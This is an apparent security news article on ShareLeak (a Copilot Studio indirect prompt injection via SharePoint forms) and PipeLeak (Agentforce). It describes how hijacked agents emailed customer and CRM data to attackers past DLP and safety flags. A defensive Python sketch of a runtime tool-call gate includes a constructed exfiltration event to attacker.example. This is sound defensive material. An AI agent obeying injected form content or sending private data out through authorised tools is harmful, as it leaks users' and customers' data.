Microsoft recently patched a critical vulnerability in Copilot Studio, but the incident has exposed a deeper, more systemic flaw in how AI agents handle sensitive data. Although the technical hole was plugged, the process revealed that existing safety guardrails—including data loss prevention (DLP) and internal safety flags—failed to stop actual data exfiltration during testing.
The vulnerability, tracked as CVE-2026-21520, is an indirect prompt injection with a CVSS score of 7.5. Discovered by the research team at Capsule Security, the flaw allowed attackers to hijack an agent’s instructions via a public-facing form. Microsoft deployed a patch on January 15, 2026, following a coordinated disclosure process that began in late 2025.
For security professionals, the patch is less significant than the precedent it sets. Assigning a Common Vulnerabilities and Exposures (CVE) identifier to a prompt injection in an agentic platform is highly unusual. It signals that the industry may be moving toward treating prompt injection not as a quirk of LLM behavior but as a formal class of software vulnerability that enterprises must track and manage.
The mechanics of ShareLeak
Researchers named the specific exploit “ShareLeak.” The attack targets the gap between a SharePoint form submission and the context window of a Copilot Studio agent. In a typical scenario, an attacker fills a public comment field with a carefully crafted payload designed to mimic a system-level instruction.

During testing, Capsule Security found that Copilot Studio concatenated this malicious input directly with the agent’s system instructions without proper sanitization. This allowed the payload to override the agent’s original purpose. In a proof-of-concept attack, the hijacked agent was directed to query connected SharePoint Lists for customer data and then transmit that information via Outlook to an email address controlled by the attacker.
The most concerning aspect of the finding was the failure of secondary defenses. Microsoft’s internal safety mechanisms flagged the request as suspicious, yet the data was exfiltrated anyway. The platform’s DLP tools did not trigger because the exfiltration ran through a legitimate Outlook action, which the platform treated as an authorized operation. This is a classic “confused deputy” problem: the agent holds the permission to send email, and the attacker simply convinced it to use that permission for a malicious goal.
The ‘Lethal Trifecta’ and the Salesforce parallel
The vulnerability is not isolated to Microsoft. Capsule Security identified a similar flaw in Salesforce Agentforce, which they dubbed “PipeLeak.” In their testing, a public lead form payload hijacked an Agentforce agent without requiring any authentication, allowing the exfiltration of CRM data with no observed volume cap.
Unlike Microsoft, Salesforce has not assigned a CVE or issued a public advisory for PipeLeak as of the latest research. This discrepancy highlights a growing divide in how AI vendors view agentic risk. While Salesforce previously patched a different vector known as “ForcedLeak” by enforcing Trusted URL allowlists, researchers found that PipeLeak bypassed those controls by using authorized email tool actions.
Naor Paz, CEO of Capsule Security, identifies a “lethal trifecta” of conditions that make any AI agent exploitable: access to private data, exposure to untrusted content, and the ability to communicate externally. Because these three elements are exactly what make agents useful for business, the vulnerability is structural rather than incidental.
Patching vs. Runtime Enforcement
The industry is now debating whether the traditional “patch-and-pray” model is sufficient for AI agents. Elia Zaitsev, CTO of CrowdStrike, argues that the patching mindset itself is a vulnerability, noting that it is nearly impossible to patch every possible prompt injection vector. Instead, Zaitsev advocates for runtime security—monitoring the actual “kinetic” actions an agent takes rather than trying to predict its intent.
This contrasts with the “guardian agent” approach, where fine-tuned small language models (SLMs) evaluate every tool call before it is executed. This layer of intent analysis aims to stop the “confused deputy” scenario by vetting the goal of the action before the agent triggers a tool like Outlook or a CRM export.
The risk is further complicated by “multi-turn crescendo” attacks. In these scenarios, an attacker does not send one large malicious prompt, but distributes the payload across several benign-looking interactions. Because most Web Application Firewalls (WAFs) are stateless—meaning they look at each request in isolation—they fail to notice the semantic trajectory of the attack until the final, malicious action is triggered.
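The following Python sketch is an added illustration for this page, not code from Capsule Security, Microsoft, Salesforce or CrowdStrike. It puts the runtime-enforcement idea and the stateless-versus-stateful distinction side by side: a per-request check in the style of a stateless WAF sees one authorised email send and passes it, while a session-aware gate judges the same send against the trajectory that preceded it (untrusted content in, private data read, external channel out). The event names, the `contoso.example` internal domain and the ShareLeak-like event sequence are all constructed for the example; only the shape of the attack comes from the text above.

```python
from dataclasses import dataclass, field

# Assumed configuration for this illustration; none of it is Copilot Studio,
# Agentforce or CrowdStrike configuration.
INTERNAL_DOMAINS = {"contoso.example"}                # assumption: the org's own domain
UNTRUSTED_INPUTS = {"public_form"}                    # anyone on the internet can write here
PRIVATE_DATA_TOOLS = {"sharepoint_list", "crm_query"} # tools that return private data
EXTERNAL_CHANNELS = {"send_email"}                    # tools that talk to the outside world


@dataclass
class Decision:
    allow: bool
    reason: str
    needs_human: bool = False   # route to human-in-the-loop approval instead of auto-allow


@dataclass
class Session:
    """Trajectory of one conversation: which trifecta conditions have been met so far."""
    ingested_untrusted: bool = False
    read_private_data: bool = False
    history: list = field(default_factory=list)


def recipient_is_external(args: dict) -> bool:
    domain = args.get("to", "").rsplit("@", 1)[-1].lower()
    return domain not in INTERNAL_DOMAINS


def stateless_check(event: str, args: dict) -> Decision:
    """One request in isolation, the way a stateless WAF sees it.

    send_email is an authorised tool for this agent, so a single email-send
    request is indistinguishable from legitimate use and passes."""
    if event in EXTERNAL_CHANNELS and recipient_is_external(args):
        return Decision(True, "authorised tool; external recipient looks like normal use")
    return Decision(True, "authorised tool")


def stateful_check(session: Session, event: str, args: dict) -> Decision:
    """Runtime gate on the kinetic action, judged against the whole session."""
    session.history.append(event)
    if event in UNTRUSTED_INPUTS:
        session.ingested_untrusted = True
        return Decision(True, "untrusted content entered the context; tracked")
    if event in PRIVATE_DATA_TOOLS:
        session.read_private_data = True
        return Decision(True, "private data read; tracked")
    if event in EXTERNAL_CHANNELS:
        if not recipient_is_external(args):
            return Decision(True, "internal recipient")
        if session.read_private_data:
            return Decision(False, "external send after a private-data read: trifecta complete")
        if session.ingested_untrusted:
            return Decision(True, "external send under untrusted influence", needs_human=True)
        return Decision(True, "external send; no private data in this session")
    return Decision(True, "no policy for this event")


def run_session(events) -> list:
    """Feed events (inputs and tool calls) through the gate, stopping at the first block.

    Events may arrive in one turn or spread over many; the Session carries the
    state either way, which is what a crescendo-style attack relies on going unnoticed."""
    session = Session()
    verdicts = []
    for event, args in events:
        decision = stateful_check(session, event, args)
        verdicts.append((event, decision))
        if not decision.allow:
            break
    return verdicts


# Constructed sequence modelled on the ShareLeak description: payload arrives via a
# public form, the agent reads a SharePoint list, then emails the rows out.
SHARELEAK_LIKE = [
    ("public_form", {"comment": "<instruction-shaped payload from an anonymous visitor>"}),
    ("sharepoint_list", {"list": "Customers"}),
    ("send_email", {"to": "drop@attacker.example", "body": "<customer rows>"}),
]


def compare_final_action(events) -> tuple:
    """(stateless verdict, stateful verdict) for the last event in the sequence."""
    last_event, last_args = events[-1]
    return stateless_check(last_event, last_args).allow, run_session(events)[-1][1].allow


if __name__ == "__main__":
    for event, d in run_session(SHARELEAK_LIKE):
        print(f"{event:16} allow={d.allow!s:5} human={d.needs_human!s:5} {d.reason}")
    print("stateless vs stateful on the final send:", compare_final_action(SHARELEAK_LIKE))
```

The gate never inspects the prompt text, which is the point: it cannot tell a clever injection from a clumsy one, but it does not need to, because it decides on what the agent is about to do and what it has already touched. The same policy lets an internal email after a SharePoint read through, and sends an external email that follows untrusted input but no private-data read to a human for approval rather than blocking it outright.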
Immediate steps for security leaders
For organizations deploying agentic AI, the window between November 24, 2025, and the January 15, 2026, patch represents a potential exposure period for Copilot Studio agents triggered by SharePoint forms, and email sent by those agents during that window warrants review.
| Vulnerability | Primary Risk | Immediate Action |
|---|---|---|
| ShareLeak | Data theft via SharePoint/Outlook | Audit Copilot Studio agents; restrict outbound email to internal domains. |
| PipeLeak | CRM data exfiltration | Review Agentforce automations triggered by public forms; enable human-in-the-loop. |
| Crescendo | Multi-turn prompt injection | Implement stateful monitoring to track conversation history across turns. |
| Coding Agents | Memory poisoning/Code execution | Audit MCP server configurations and restrict code execution permissions. |
Security directors are encouraged to classify every agent deployment based on the “lethal trifecta” exposure. If an agent has access to sensitive data and can communicate with the outside world, it should be treated as a high-risk asset regardless of whether a specific CVE has been issued.
The next critical checkpoint for the industry will be the broader adoption of agentic security frameworks, such as the OWASP Top 10 for Agentic Applications, as companies move from experimental pilots to full-scale production deployments in 2026.
